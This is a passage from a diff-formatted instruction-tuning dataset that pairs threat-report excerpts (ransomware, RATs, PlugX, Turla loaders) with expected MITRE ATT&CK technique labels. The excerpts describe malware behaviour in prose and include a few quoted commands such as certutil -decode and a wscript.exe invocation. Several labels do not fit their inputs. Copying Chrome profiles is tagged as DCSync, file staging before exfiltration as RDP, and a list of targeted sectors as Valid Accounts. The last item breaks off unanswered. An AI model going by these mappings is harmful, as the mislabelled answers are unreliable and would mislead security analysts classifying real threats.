obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sodinokibi gathers some basic system information and saves it to the registry together with the generated encryption parameters. If the dbg option is not set in the config, the UI language and keyboard layout values are checked, and the malware will simply exit on systems which use one of the following language codes", + "output": "- T1112: Modify Registry\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Cisco Talos has discovered a new malware campaign based on a previously unknown family we're calling \"\"PoetRAT. The droppers are Microsoft Word documents that deploy a Python-based remote access trojan (RAT). We named this malware PoetRAT due to the various references to William Shakespeare, an English poet and playwright. The RAT has all the standard features of this kind of malware, providing full control of the compromised system to the operation. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. The campaign shows us that the operators manually pushed additional tools when they needed them on the compromised systems. We will describe a couple of these tools. The most interesting is a tool used to monitor the hard disk and exfiltrate data automatically. Besides these, there are keyloggers, browser-focused password stealers, camera control applications, and other generic password stealers\"", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PDB Path: C:\\Users\\803\\Desktop\\ytyboth\\yty 2.0\\Release\\vstservice.pdb The vstservice.exe plugin is .NET file responsible for sending a list of the file system to the C2. The malware retrieves the C2 from a Google Docs file like the previous binaries. The file was located at the following location", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In one sample we analyzed, the zip file contains a VBS file named NUM_56960.vbs. The size of the file is around 30MB. The large file size helps it evade detection, as file scanners usually skip scanning huge files for performance reasons. This VBS file then downloads the malicious executable file PaintHelper.exe", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Maze-delivered virtual machine was running Windows 7, as opposed to the Windows XP VM distributed in the Ragnar Locker incident. In this case, Cryptoguard was preventing the malware from encrypting files by intercepting and neutralizing the Windows APIs that the ransomware was attempting to use to encrypt the hard drive. Weaponized virtual machine . The Maze attackers delivered the attack components for the third attack in the form of an .msi installer file. The root of that virtual disk contained three files associated with the Maze ransomware: preload.bat, vrun.exe, and a file just named payload (with no file extension), which is the actual Maze DLL payload. The Maze attackers took a slightly different approach, using a virtual Windows 7 machine instead of XP. The virtual machine (VM) that Sophos extracted from the Maze attack shows that this (newer) VM is configured in such a way that it allows easy insertion of another ransomware on the attacker\u2019s \u2018builder\u2019 machine. But the cost in terms of size is signficant: The Ragnar Locker virtual disk was only a quarter the size of the nearly 2GB virtual disk used in the Maze attack\u2014all just to conceal one 494 KB ransomware executable from detection. The attackers also executed the following commands on the host computer during the Maze attack: This ran the Microsoft Installer that installs VirtualBox and the virtual hard drive. They stop the Volume Shadow Copy service; the ransomware itself includes a command to delete existing shadow copies. The Maze threat actors have proven to be adept at adopting the techniques demonstrated to be successful by other ransomware gangs, including the use of extortion as a means to extract payment from victims", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Using job opportunities as template is the known method used by Lazarus to target its victims. The documents created by this actor are well designed and contain a large icon for a known company such as LockHeed Martin, BAE Systems, Boeing and Northrop Grumman in the template. In this campaign the actor has targeted people that are looking for job opportunities at Lockheed Martin. The document\u2019s metadata used in this campaign links them to several other documents used by this actor in the past", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Windows Defender ATP displays these activities as process trees in a machine timeline for the infected computer. Analysts can easily extract detailed information from these trees, such as the implant DLL dropped by the installer, the command used to call rundll32.exe and load the DLL, and the registry modifications that set the DLL as a service", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The function of this tool is to set up a TCP listener on a localhost, receive encoded data via requests from the\u202fSodomNormal\u202flocalhost module, and to forward this data to the command and control IP via HTTP. The GUP Proxy Tool has a hardcoded configuration which is included as both strings and integers", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Note that regardless of whether Nyetya is successful in overwriting the boot sector or not, it will proceed to create a scheduled task via schtasks to reboot the system one hour after infection", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1529: System Shutdown/Reboot" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable. In this particular instance, the payload is encoded via base64, which certutil decodes. The payload in question is a CAB file that is then unpacked. Finally, the malware executes the extracted install.bat script before deleting the original files and exiting", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While PotPlayerDB.dat is a variant of PlugX malware, TA416 has updated the payload by changing both its encoding method and expanding the payload\u2019s configuration capabilities. Historically, TA416 relied on the DLL launcher to decode the PlugX payload utilizing an XOR key included at the offset 0 within the PlugX DAT configuration file. One of the main ways it does this is by resolving API functions during runtime. Generally, malware loads a DLL, iterates over the set of exports of the DLL and hashes the string, looking for a matching hash. This iteration of PlugX does standard API hashing, but only to resolve the address of the functions GetProcAddress as well as LoadLibrary. Once those functions are resolved properly, it loads the rest of the functions via their text name", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Torisma uses this method to send data back to the C2 server read from the named pipe. This is the results of the execution of the shellcode on the victim\u2019s system through the ViewPrevPage action and the results of this execution are sent and processed using this function", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. To date, we have only collected 14 samples of this variant, indicating it may be sparingly used. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file\u2019s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mustang Panda APT uses a package of binaries to load the actual payload and it is intentionally designed this way to bypass file scanners and sandboxes. Obviously, file scanners or sandboxes can\u2019t detect the PlugX payload without the encrypted DAT file", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HOLMIUM has been observed using various vectors for initial access, including spear-phishing email, sometimes carrying archive attachments that exploit the CVE-2018-20250 vulnerability in WinRAR, and password-spraying. Many of their recent attacks, however, have involved the penetration testing tool Ruler used in tandem with compromised Exchange credentials", + "output": "- T1110.003: Brute Force - Password Spraying" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Completing missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft", + "output": "- T1021.001: Remote Services - Remote Desktop Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"It creates the folder \"\"\\ProgramData\\AuditService\\\"\" and copies the clean file \"\"lsass.exe\"\" (taken from \"\"\\Windows\\System32\\\"\") into the folder. The tainted \"\"services.exe\"\" installs \"\"\\ProgramData\\AuditService\\lsass.exe\"\" as an autostart Windows service named \"\"Audit Service\"\". When the new \"\"lsass.exe\"\" service autostarts, the malicious file \"\"sspisrv.dll\"\" sideloads in the same folder. lsass.exe\"\" will eventually crash because of a failure to load other dependencies\"", + "output": "- T1543.003: Create or Modify System Process - Windows Service\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Companies in multiple sectors are targeted in this campaign, including those operating in the automotive, pharmaceutical, and engineering sector, as well as managed service providers (MSPs", + "output": "- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The maldocs used in this campaign typically contain a malicious VBA macro that downloads and activates the next stage of the infection chain. Although the VBA macro contains an auto open subroutine, it uses several VBA functions registered to trigger if the \"\"Typing replaces selection\"\" property is enabled in Microsoft Word. The VBA functions trigger when the victim types any content into the maldoc. Appdata%\\desktop.iniThe next stage of the VBS is run using wscript.exe using a command such as:%windir%\\System32\\wscript.exe //e:vbscript //b <path_to_Stage_2>Macros dropping VBS to disk and running via wscript.exe\"", + "output": "- T1204.002: User Execution - Malicious File\n- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The stage 2 payload for the macOS X malware was decoded and analyzed. The stage 2 malware has a variety of functionalities. Most importantly, it checks in with a C2 and, after connecting to the C2, can send or receive a payload, read and write files, execute commands via the terminal, etc", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data", + "output": "- T1003.006: OS Credential Dumping - DCSync" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"TA416 has used SMTP2Go to impersonate various European diplomatic organizations since at least 2020. In this historical campaign, TA416 delivered a DropBox URL that delivered a PlugX variant aligning with Recorded Future\u2019s\u00a0analysis\u00a0of \"\"Red Delta\"\" PlugX malware. Included below is a publicly available malicious Zip file hash from August 2020 delivered via a DropBox URL which is attributable to TA416/Red Delta\"", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"One, called \"\"frown.py,\"\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. The RAT will answer the \"\"who\"\" command with a string that contains the username, computer name and the previously generated UUID. The \"\"ice\"\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are\"", + "output": "- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The use of the web bug reconnaissance technique suggests TA416 is being more discerning about which targets the group chooses to deliver malware payloads. Historically, the group primarily delivered web bug URLs alongside malware URLs to confirm receipt. In 2022, the group started to first profile users and then deliver malware URLs. This may be an attempt by TA416 to avoid having their malicious tools discovered and publicly disclosed. By narrowing the lens of targeting from broad phishing campaigns to focus on targets that have proven to be active and willing to open emails, TA416 increases its chance of success when following up with malicious malware payloads", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In such a situation, the malware will find and run the built-in Microsoft Windows InfDefaultInstall.exe program, which will install a DLL via an INF file. Should Tencent be installed, the malware will execute the InfDefaultInstall.exe program with an argument of \u2018QQMgr.inf\u2019. Otherwise, it will use \u2018hccutils.inf\u2019 as an argument", + "output": "- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry. Attached to this email was a malicious Microsoft Word document (MD5: f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158. It is worth noting that this email appeared to have been sent from another Taiwanese Government employee, implying that the email was sent from a valid but compromised account", + "output": "- T1204.002: User Execution - Malicious File\n- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After successful lateral movement, the attackers tried to establish persistency on selected servers \u2013targeting all domain controllers, but also other servers. To achieve persistency, they used WMI Event Subscription with a few different WMI objects", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The macro prepends the string -----BEGIN CERTIFICATE----- to the beginning of the base64 encoded payload and appends -----END CERTIFICATE----- to the end of the data. The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension. The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder. The newly dropped executable is a loader Trojan responsible for installing and running the payload of this attack. Overall, SofacyCarberp does initial reconnaissance by gathering system information and sending it to the C2 server prior to downloading additional tools to the system. These differences include a new hashing algorithm to resolve API functions and to find running browser processes for injection, as well as changes to the C2 communication mechanisms as explained in detail within the appendix. Open-source Delivery Document Generator It appears that Sofacy may have used an open-source tool called Luckystrike to generate the delivery document and/or the macro used in this attack. Luckystrike, which was presented at DerbyCon 6 in September 2016, is a Microsoft PowerShell-based tool that generates malicious delivery documents by allowing a user to add a macro to an Excel or Word document to execute an embedded payload. To confirm our suspicions, we generated a malicious Excel file with Luckystrike and compared its macro to the macro found within Sofacy's delivery document. We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the connection to the C2 server is successful, the script parses the output and invokes it using IEX. The script sleeps for a random number of seconds between 60 and 100 after each attempt to reach the C2. The GET requests will be parsed by LitePower and invoked using PowerShell\u2019s IEX function", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It only installs the second-stage script in the default registry value under the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot. Variant B registers a scheduled task named Sibot and programmed to run daily. This task, which is saved by Windows in the file C:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\WindowsUpdate\\sibot, runs the following command-line daily", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Embedded Downloader Trojan The M payload (referenced previously along with the R payload, above) injected and executed within the memory space of the other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the functional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The payload extracts this VBScript from a resource and saves it to a file that it extracts from another resource", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The folder C:\\Users\\Public\\Administrador\\logs\\ is created to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites (Figure 12). The screenshots are continuously saved as .jpg images", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Resolves WINAPI functions 2) Hides its GUI using ShowWindow WINAPI call 3) Compares if the DLL is being ran by wmplayer", + "output": "- T1564.003: Hide Artifacts - Hidden Window" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BADNEWS Much of BADNEWS has remained consistent from when it was originally discussed by Forcepoint in August 2016. To briefly recap, the BADNEWS malware family acts as a backdoor, with communication occurring over HTTP. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop", + "output": "- T1102.001: Web Service - Dead Drop Resolver" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products. After a few months, Turla has improved these scripts and is now using them to load a wide range of custom malware from its traditional arsenal. PowerShell Loader . The PowerShell loader has three main steps: persistence, decryption and loading into memory of the embedded executable or library. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload. WMI consumer PowerShell command . Finally, the script stores the encrypted payload in the Windows registry. Hijacked profile.ps1 file . The base64-encoded PowerShell command is very similar to the one used in the WMI consumers. The key and the salt are also different for each script and are not stored in the script, but only in the WMI filter or in the profile.ps1 file. Patching of AmsiScanBuffer function . Payloads . The PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC Backdoor and a PowerShell backdoor. We have seen operators use this backdoor for the following purposes: Conclusion . In a 2018 blogpost, we predicted that Turla would use more and more generic tools. 